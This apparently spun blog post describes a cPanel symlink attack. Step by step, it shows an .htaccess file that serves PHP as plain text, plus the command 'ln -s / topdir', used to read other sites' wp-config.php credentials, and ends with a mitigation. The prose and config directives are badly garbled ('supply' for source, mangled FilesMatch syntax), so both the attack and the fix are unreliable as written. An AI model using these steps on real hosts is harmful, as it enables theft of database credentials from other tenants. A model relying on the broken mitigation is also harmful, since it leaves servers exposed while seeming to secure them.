how hackers attack your cpanel

Posted by Ilyas online blog

let me show you that methodology hacker... uses for getting supply as out to the config files of your respective web-site as an example wp-config. php and that i can show you ways to minimize this. 

) he login to cpanel currently being a normal user http ://ip-address/cpanel then jenis login and password to login 
2 ) then he open file manager ( show hidden files dotfiles ) after which creates new. htaccess file with following supply : 
#. htaccess file supply 
choices indexes followsymlinks 
directoryindex doesnt-metter. htm 
addtype txt. php 
addhandler txt. php 
#end of. htaccess file 
3 ) then he creates symbalic link ( soft link ) with perl scripts or barely uses cron job to make symbalic link of top level directory / typing : ln -s / topdir 
4 ) after that, he open browser and typing http ://server-ip/~his-home-dir/topdi... /wp-config. php after which barely looking supply as out to the page, all data present currently being a txt( text ) data. thats all. user has actually been hacked. 
------------------------------------------------------------------------------------------------------- 
answer : 
) open your php. conf along with your favorite ubahor : nano /usr/local/apache/conf/php. conf 
2 ) commit : #addtype application/x-httpd-php5. php5. php4. php. php3. php2. phtml 
3 ) add these lines : 
filesmatch. ph( p2-6 ?|tml )$ # this add up to :. php, . php2, . php3, . php4, . php5, . php6. phtml 
sethandler application/x-httpd-php5 
/filesmatch 
4 ) save your changes and shut php. conf 
5 ) restart httpd server typing : /etc/init. d/httpd restart 
6 ) done

Related Post



Post a Comment